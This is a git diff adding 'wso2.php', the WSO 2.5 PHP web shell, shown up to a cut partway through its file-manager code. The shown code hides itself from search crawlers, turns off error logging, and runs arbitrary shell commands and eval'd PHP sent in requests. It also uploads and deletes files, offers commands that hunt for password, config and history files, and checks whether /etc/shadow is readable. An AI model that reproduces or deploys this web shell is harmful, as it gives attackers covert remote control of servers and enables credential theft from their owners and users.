diff --git a/php/wso/wso2.php b/php/wso/wso2.php
new file mode 100644
index 00000000..2ffc09ac
--- /dev/null
+++ b/php/wso/wso2.php
@@ -0,0 +1,1522 @@
+<?php
+$auth_pass = "63a9f0ea7bb98050796b649e85481845";
+$color = "#df5";
+$default_action = 'FilesMan';
+$default_use_ajax = true;
+$default_charset = 'Windows-1251';
+
+if(!empty($_SERVER['HTTP_USER_AGENT'])) {
+    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
+    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
+        header('HTTP/1.0 404 Not Found');
+        exit;
+    }
+}
+
+@ini_set('error_log',NULL);
+@ini_set('log_errors',0);
+@ini_set('max_execution_time',0);
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+@define('WSO_VERSION', '2.5');
+
+if(get_magic_quotes_gpc()) {
+	function WSOstripslashes($array) {
+		return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
+	}
+	$_POST = WSOstripslashes($_POST);
+    $_COOKIE = WSOstripslashes($_COOKIE);
+}
+
+function wsoLogin() {
+	die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
+}
+
+function WSOsetcookie($k, $v) {
+    $_COOKIE[$k] = $v;
+    setcookie($k, $v);
+}
+
+if(!empty($auth_pass)) {
+    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
+
+    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
+        wsoLogin();
+}
+
+if(strtolower(substr(PHP_OS,0,3)) == "win")
+	$os = 'win';
+else
+	$os = 'nix';
+
+$safe_mode = @ini_get('safe_mode');
+if(!$safe_mode)
+    error_reporting(0);
+
+$disable_functions = @ini_get('disable_functions');
+$home_cwd = @getcwd();
+if(isset($_POST['c']))
+	@chdir($_POST['c']);
+$cwd = @getcwd();
+if($os == 'win') {
+	$home_cwd = str_replace("\\", "/", $home_cwd);
+	$cwd = str_replace("\\", "/", $cwd);
+}
+if($cwd[strlen($cwd)-1] != '/')
+	$cwd .= '/';
+
+if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
+    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;
+
+if($os == 'win')
+	$aliases = array(
+		"List Directory" => "dir",
+    	"Find index.php in current dir" => "dir /s /w /b index.php",
+    	"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
+    	"Show active connections" => "netstat -an",
+    	"Show running services" => "net start",
+    	"User accounts" => "net user",
+    	"Show computers" => "net view",
+		"ARP Table" => "arp -a",
+		"IP Configuration" => "ipconfig /all"
+	);
+else
+	$aliases = array(
+  		"List dir" => "ls -lha",
+		"list file attributes on a Linux second extended file system" => "lsattr -va",
+  		"show opened ports" => "netstat -an | grep -i listen",
+        "process status" => "ps aux",
+		"Find" => "",
+  		"find all suid files" => "find / -type f -perm -04000 -ls",
+  		"find suid files in current dir" => "find . -type f -perm -04000 -ls",
+  		"find all sgid files" => "find / -type f -perm -02000 -ls",
+  		"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
+  		"find config.inc.php files" => "find / -type f -name config.inc.php",
+  		"find config* files" => "find / -type f -name \"config*\"",
+  		"find config* files in current dir" => "find . -type f -name \"config*\"",
+  		"find all writable folders and files" => "find / -perm -2 -ls",
+  		"find all writable folders and files in current dir" => "find . -perm -2 -ls",
+  		"find all service.pwd files" => "find / -type f -name service.pwd",
+  		"find service.pwd files in current dir" => "find . -type f -name service.pwd",
+  		"find all .htpasswd files" => "find / -type f -name .htpasswd",
+  		"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
+  		"find all .bash_history files" => "find / -type f -name .bash_history",
+  		"find .bash_history files in current dir" => "find . -type f -name .bash_history",
+  		"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
+  		"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
+		"Locate" => "",
+  		"locate httpd.conf files" => "locate httpd.conf",
+		"locate vhosts.conf files" => "locate vhosts.conf",
+		"locate proftpd.conf files" => "locate proftpd.conf",
+		"locate psybnc.conf files" => "locate psybnc.conf",
+		"locate my.conf files" => "locate my.conf",
+		"locate admin.php files" =>"locate admin.php",
+		"locate cfg.php files" => "locate cfg.php",
+		"locate conf.php files" => "locate conf.php",
+		"locate config.dat files" => "locate config.dat",
+		"locate config.php files" => "locate config.php",
+		"locate config.inc files" => "locate config.inc",
+		"locate config.inc.php" => "locate config.inc.php",
+		"locate config.default.php files" => "locate config.default.php",
+		"locate config* files " => "locate config",
+		"locate .conf files"=>"locate '.conf'",
+		"locate .pwd files" => "locate '.pwd'",
+		"locate .sql files" => "locate '.sql'",
+		"locate .htpasswd files" => "locate '.htpasswd'",
+		"locate .bash_history files" => "locate '.bash_history'",
+		"locate .mysql_history files" => "locate '.mysql_history'",
+		"locate .fetchmailrc files" => "locate '.fetchmailrc'",
+		"locate backup files" => "locate backup",
+		"locate dump files" => "locate dump",
+		"locate priv files" => "locate priv"
+	);
+
+function wsoHeader() {
+	if(empty($_POST['charset']))
+		$_POST['charset'] = $GLOBALS['default_charset'];
+	global $color;
+	echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title>
+<style>
+body{background-color:#444;color:#e1e1e1;}
+body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
+table.info{ color:#fff;background-color:#222; }
+span,h1,a{ color: $color !important; }
+span{ font-weight: bolder; }
+h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
+div.content{ padding: 5px;margin-left:5px;background-color:#333; }
+a{ text-decoration:none; }
+a:hover{ text-decoration:underline; }
+.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
+.bigarea{ width:100%;height:300px; }
+input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
+form{ margin:0px; }
+#toolsTbl{ text-align:center; }
+.toolsInp{ width: 300px }
+.main th{text-align:left;background-color:#5e5e5e;}
+.main tr:hover{background-color:#5e5e5e}
+.l1{background-color:#444}
+.l2{background-color:#333}
+pre{font-family:Courier,Monospace;}
+</style>
+<script>
+    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
+    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
+    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
+    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
+    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
+    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
+    var d = document;
+	function set(a,c,p1,p2,p3,charset) {
+		if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
+		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
+		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
+		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
+		if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
+		if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
+	}
+	function g(a,c,p1,p2,p3,charset) {
+		set(a,c,p1,p2,p3,charset);
+		d.mf.submit();
+	}
+	function a(a,c,p1,p2,p3,charset) {
+		set(a,c,p1,p2,p3,charset);
+		var params = 'ajax=true';
+		for(i=0;i<d.mf.elements.length;i++)
+			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
+		sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
+	}
+	function sr(url, params) {
+		if (window.XMLHttpRequest)
+			req = new XMLHttpRequest();
+		else if (window.ActiveXObject)
+			req = new ActiveXObject('Microsoft.XMLHTTP');
+        if (req) {
+            req.onreadystatechange = processReqChange;
+            req.open('POST', url, true);
+            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
+            req.send(params);
+        }
+	}
+	function processReqChange() {
+		if( (req.readyState == 4) )
+			if(req.status == 200) {
+				var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
+				var arr=reg.exec(req.responseText);
+				eval(arr[2].substr(0, arr[1]));
+			} else alert('Request error!');
+	}
+</script>
+<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
+<form method=post name=mf style='display:none;'>
+<input type=hidden name=a>
+<input type=hidden name=c>
+<input type=hidden name=p1>
+<input type=hidden name=p2>
+<input type=hidden name=p3>
+<input type=hidden name=charset>
+</form>";
+	$freeSpace = @diskfreespace($GLOBALS['cwd']);
+	$totalSpace = @disk_total_space($GLOBALS['cwd']);
+	$totalSpace = $totalSpace?$totalSpace:1;
+	$release = @php_uname('r');
+	$kernel = @php_uname('s');
+	$explink = 'http://exploit-db.com/search/?action=search&filter_description=';
+	if(strpos('Linux', $kernel) !== false)
+		$explink .= urlencode('Linux Kernel ' . substr($release,0,6));
+	else
+		$explink .= urlencode($kernel . ' ' . substr($release,0,3));
+	if(!function_exists('posix_getegid')) {
+		$user = @get_current_user();
+		$uid = @getmyuid();
+		$gid = @getmygid();
+		$group = "?";
+	} else {
+		$uid = @posix_getpwuid(posix_geteuid());
+		$gid = @posix_getgrgid(posix_getegid());
+		$user = $uid['name'];
+		$uid = $uid['uid'];
+		$group = $gid['name'];
+		$gid = $gid['gid'];
+	}
+
+	$cwd_links = '';
+	$path = explode("/", $GLOBALS['cwd']);
+	$n=count($path);
+	for($i=0; $i<$n-1; $i++) {
+		$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
+		for($j=0; $j<=$i; $j++)
+			$cwd_links .= $path[$j].'/';
+		$cwd_links .= "\")'>".$path[$i]."/</a>";
+	}
+
+	$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
+	$opt_charsets = '';
+	foreach($charsets as $item)
+		$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
+
+	$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
+	if(!empty($GLOBALS['auth_pass']))
+		$m['Logout'] = 'Logout';
+	$m['Self remove'] = 'SelfRemove';
+	$menu = '';
+	foreach($m as $k => $v)
+		$menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
+
+	$drives = "";
+	if($GLOBALS['os'] == 'win') {
+		foreach(range('c','z') as $drive)
+		if(is_dir($drive.':\\'))
+			$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
+	}
+	echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
+       . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>')
+       . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
+       . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
+       . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
+}
+
+function wsoFooter() {
+	$is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
+    echo "
+</div>
+<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
+	<tr>
+		<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
+		<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
+	</tr><tr>
+		<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
+		<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
+	</tr><tr>
+		<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
+		<td><form method='post' ENCTYPE='multipart/form-data'>
+		<input type=hidden name=a value='FilesMAn'>
+		<input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
+		<input type=hidden name=p1 value='uploadFile'>
+		<input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
+		<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
+	</tr></table></div></body></html>";
+}
+
+if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
+    function posix_getpwuid($p) {return false;} }
+if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
+    function posix_getgrgid($p) {return false;} }
+
+function wsoEx($in) {
+	$out = '';
+	if (function_exists('exec')) {
+		@exec($in,$out);
+		$out = @join("\n",$out);
+	} elseif (function_exists('passthru')) {
+		ob_start();
+		@passthru($in);
+		$out = ob_get_clean();
+	} elseif (function_exists('system')) {
+		ob_start();
+		@system($in);
+		$out = ob_get_clean();
+	} elseif (function_exists('shell_exec')) {
+		$out = shell_exec($in);
+	} elseif (is_resource($f = @popen($in,"r"))) {
+		$out = "";
+		while(!@feof($f))
+			$out .= fread($f,1024);
+		pclose($f);
+	}
+	return $out;
+}
+
+function wsoViewSize($s) {
+    if (is_int($s))
+        $s = sprintf("%u", $s);
+    
+	if($s >= 1073741824)
+		return sprintf('%1.2f', $s / 1073741824 ). ' GB';
+	elseif($s >= 1048576)
+		return sprintf('%1.2f', $s / 1048576 ) . ' MB';
+	elseif($s >= 1024)
+		return sprintf('%1.2f', $s / 1024 ) . ' KB';
+	else
+		return $s . ' B';
+}
+
+function wsoPerms($p) {
+	if (($p & 0xC000) == 0xC000)$i = 's';
+	elseif (($p & 0xA000) == 0xA000)$i = 'l';
+	elseif (($p & 0x8000) == 0x8000)$i = '-';
+	elseif (($p & 0x6000) == 0x6000)$i = 'b';
+	elseif (($p & 0x4000) == 0x4000)$i = 'd';
+	elseif (($p & 0x2000) == 0x2000)$i = 'c';
+	elseif (($p & 0x1000) == 0x1000)$i = 'p';
+	else $i = 'u';
+	$i .= (($p & 0x0100) ? 'r' : '-');
+	$i .= (($p & 0x0080) ? 'w' : '-');
+	$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
+	$i .= (($p & 0x0020) ? 'r' : '-');
+	$i .= (($p & 0x0010) ? 'w' : '-');
+	$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
+	$i .= (($p & 0x0004) ? 'r' : '-');
+	$i .= (($p & 0x0002) ? 'w' : '-');
+	$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
+	return $i;
+}
+
+function wsoPermsColor($f) {
+	if (!@is_readable($f))
+		return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
+	elseif (!@is_writable($f))
+		return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
+	else
+		return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
+}
+
+function wsoScandir($dir) {
+    if(function_exists("scandir")) {
+        return scandir($dir);
+    } else {
+        $dh  = opendir($dir);
+        while (false !== ($filename = readdir($dh)))
+            $files[] = $filename;
+        return $files;
+    }
+}
+
+function wsoWhich($p) {
+	$path = wsoEx('which ' . $p);
+	if(!empty($path))
+		return $path;
+	return false;
+}
+
+function actionSecInfo() {
+	wsoHeader();
+	echo '<h1>Server security information</h1><div class=content>';
+	function wsoSecParam($n, $v) {
+		$v = trim($v);
+		if($v) {
+			echo '<span>' . $n . ': </span>';
+			if(strpos($v, "\n") === false)
+				echo $v . '<br>';
+			else
+				echo '<pre class=ml1>' . $v . '</pre>';
+		}
+	}
+
+	wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
+    if(function_exists('apache_get_modules'))
+        wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
+	wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
+	wsoSecParam('Open base dir', @ini_get('open_basedir'));
+	wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
+	wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
+	wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
+	$temp=array();
+	if(function_exists('mysql_get_client_info'))
+		$temp[] = "MySql (".mysql_get_client_info().")";
+	if(function_exists('mssql_connect'))
+		$temp[] = "MSSQL";
+	if(function_exists('pg_connect'))
+		$temp[] = "PostgreSQL";
+	if(function_exists('oci_connect'))
+		$temp[] = "Oracle";
+	wsoSecParam('Supported databases', implode(', ', $temp));
+	echo '<br>';
+
+	if($GLOBALS['os'] == 'nix') {
+            wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
+            wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
+            wsoSecParam('OS version', @file_get_contents('/proc/version'));
+            wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
+            if(!$GLOBALS['safe_mode']) {
+                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
+                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
+                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
+                echo '<br>';
+                $temp=array();
+                foreach ($userful as $item)
+                    if(wsoWhich($item))
+                        $temp[] = $item;
+                wsoSecParam('Userful', implode(', ',$temp));
+                $temp=array();
+                foreach ($danger as $item)
+                    if(wsoWhich($item))
+                        $temp[] = $item;
+                wsoSecParam('Danger', implode(', ',$temp));
+                $temp=array();
+                foreach ($downloaders as $item)
+                    if(wsoWhich($item))
+                        $temp[] = $item;
+                wsoSecParam('Downloaders', implode(', ',$temp));
+                echo '<br/>';
+                wsoSecParam('HDD space', wsoEx('df -h'));
+                wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
+                echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
+                if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
+                    $temp = "";
+                    for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
+                        $uid = @posix_getpwuid($_POST['p2']);
+                        if ($uid)
+                            $temp .= join(':',$uid)."\n";
+                    }
+                    echo '<br/>';
+                    wsoSecParam('Users', $temp);
+                }
+            }
+	} else {
+		wsoSecParam('OS Version',wsoEx('ver'));
+		wsoSecParam('Account Settings',wsoEx('net accounts'));
+		wsoSecParam('User Accounts',wsoEx('net user'));
+	}
+	echo '</div>';
+	wsoFooter();
+}
+
+function actionPhp() {
+	if(isset($_POST['ajax'])) {
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
+		ob_start();
+		eval($_POST['p1']);
+		$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
+		echo strlen($temp), "\n", $temp;
+		exit;
+	}
+    if(empty($_POST['ajax']) && !empty($_POST['p1']))
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
+
+	wsoHeader();
+	if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
+		echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
+		ob_start();
+		phpinfo();
+		$tmp = ob_get_clean();
+        $tmp = preg_replace(array (
+            '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU',
+            '!td, th {(.*)}!msiU',
+            '!<img[^>]+>!msiU',
+        ), array (
+            '',
+            '.e, .v, .h, .h th {$1}',
+            ''
+        ), $tmp);
+		echo str_replace('<h1','<h2', $tmp) .'</div><br>';
+	}
+    echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
+	echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
+	if(!empty($_POST['p1'])) {
+		ob_start();
+		eval($_POST['p1']);
+		echo htmlspecialchars(ob_get_clean());
+	}
+	echo '</pre></div>';
+	wsoFooter();
+}
+
+function actionFilesMan() {
+    if (!empty ($_COOKIE['f']))
+        $_COOKIE['f'] = @unserialize($_COOKIE['f']);
+    
+	if(!empty($_POST['p1'])) {
+		switch($_POST['p1']) {
+			case 'uploadFile':
+				if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
+					echo "Can't upload file!";
+				break;
+			case 'mkdir':
+				if(!@mkdir($_POST['p2']))
+					echo "Can't create new dir";
+				break;
+			case 'delete':
+				function deleteDir($path) {
+					$path = (substr($path,-1)=='/') ? $path:$path.'/';
+					$dh  = opendir($path);
+					while ( ($item = readdir($dh) ) !== false) {
+						$item = $path.$item;
+						if ( (basename($item) == "..") || (basename($item) == ".") )
+							continue;
+						$type = filetype($item);
+						if ($type == "dir")
+							deleteDir($item);
+						else
+							@unlink($item);
+					}
+					closedir($dh);
+					@rmdir($path);
+				}
+				if(is_array(@$_POST['f']))
+					foreach($_POST['f'] as $f) {
+                        if($f == '..')
+                            continue;
+						$f = urldecode($f);
+						if(is_dir($f))
+							deleteDir($f);
+						else
+							@unlink($f);
+					}
+				break;
+			case 'paste':
+				if($_COOKIE['act'] == 'copy') {
+					function copy_paste($c,$s,$d){
+						if(is_dir($c.$s)){
+							mkdir($d.$s);
+							$h = @opendir($c.$s);
+							while (($f = @readdir($h)) !== false)
+								if (($f != ".") and ($f != ".."))
+									copy_paste($c.$s.'/',$f, $d.$s.'/');
+						} elseif(is_file($c.$s))
+							@copy($c.$s, $d.$s);
+					}
+					foreach($_COOKIE['f'] as $f)
+						copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
+				} elseif($_COOKIE['act'] == 'move') {
+					function move_paste($c,$s,$d){
+						if(is_dir($c.$s)){
+							mkdir($d.$s);
+							$h = @opendir($c.$s);
+							while (($f = @readdir($h)) !== false)
+								if (($f != ".") and ($f != ".."))
+									copy_paste($c.$s.'/',$f, $d.$s.'/');
+						} elseif(@is_file($c.$s))
+							@copy($c.$s, $d.$s);
+					}
+					foreach($_COOKIE['f'] as $f)
+						@rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
+				} elseif($_COOKIE['act'] == 'zip') {
+					if(class_exists('ZipArchive')) {
+                        $zip = new ZipArchive();
+                        if ($zip->open($_POST['p2'], 1)) {
+                            chdir($_COOKIE['c']);
+                            foreach($_COOKIE['f'] as $f) {
+                                if($f == '..')
+                                    continue;
+                                if(@is_file($_COOKIE['c'].$f))
+                                    $zip->addFile($_COOKIE['c'].$f, $f);
+                                elseif(@is_dir($_COOKIE['c'].$f)) {
+                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
+                                    foreach ($iterator as $key=>$value) {
+                                        $zip->addFile(realpath($key), $key);
+                                    }
+                                }
+                            }
+                            chdir($GLOBALS['cwd']);
+                            $zip->close();
+                        }
+                    }
+				} elseif($_COOKIE['act'] == 'unzip') {
+					if(class_exists('ZipArchive')) {
+                        $zip = new ZipArchive();
+                        foreach($_COOKIE['f'] as $f) {
+                            if($zip->open($_COOKIE['c'].$f)) {
+                                $zip->extractTo($GLOBALS['cwd']);
+                                $zip->close();
+                            }
+                        }
+                    }
+				} elseif($_COOKIE['act'] == 'tar') {
+                    chdir($_COOKIE['c']);
+                    $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
+                    wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
+                    chdir($GLOBALS['cwd']);
+				}
+				unset($_COOKIE['f']);
+                setcookie('f', '', time() - 3600);
+				break;
+			default:
+                if(!empty($_POST['p1'])) {
+					WSOsetcookie('act', $_POST['p1']);
+					WSOsetcookie('f', serialize(@$_POST['f']));
+					WSOsetcookie('c', @$_POST['c']);
+				}
+				break;
+		}
+	}
+    wsoHeader();
+	echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
+	$dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
+	if($dirContent === false) {	echo 'Can\'t open this folder!';wsoFooter(); return; }
+	global $sort;
+	$sort = array('name', 1);
+	if(!empty($_POST['p1'])) {
+		if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
+			$sort = array($match[1], (int)$match[2]);
+	}
+echo "<script>
+	function sa() {
+		for(i=0;i<d.files.elements.length;i++)
+			if(d.files.elements[i].type == 'checkbox')
+				d.files.elements[i].checked = d.files.elements[0].checked;
+	}
+</script>
+<table width='100%' class='main' cellspacing='0' cellpadding='2'>
+<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
+	$dirs = $files = array();
+	$n = count($dirContent);
+	for($i=0;$i<$n;$i++) {
+		$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
+		$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
+		$tmp = array('name' => $dirContent[$i],
+					 'path' => $GLOBALS['cwd'].$dirContent[$i],
+					 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
+					 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
+					 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
+					 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
+					 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
+					);
+		if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
+			$files[] = array_merge($tmp, array('type' => 'file'));
+		elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
+			$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
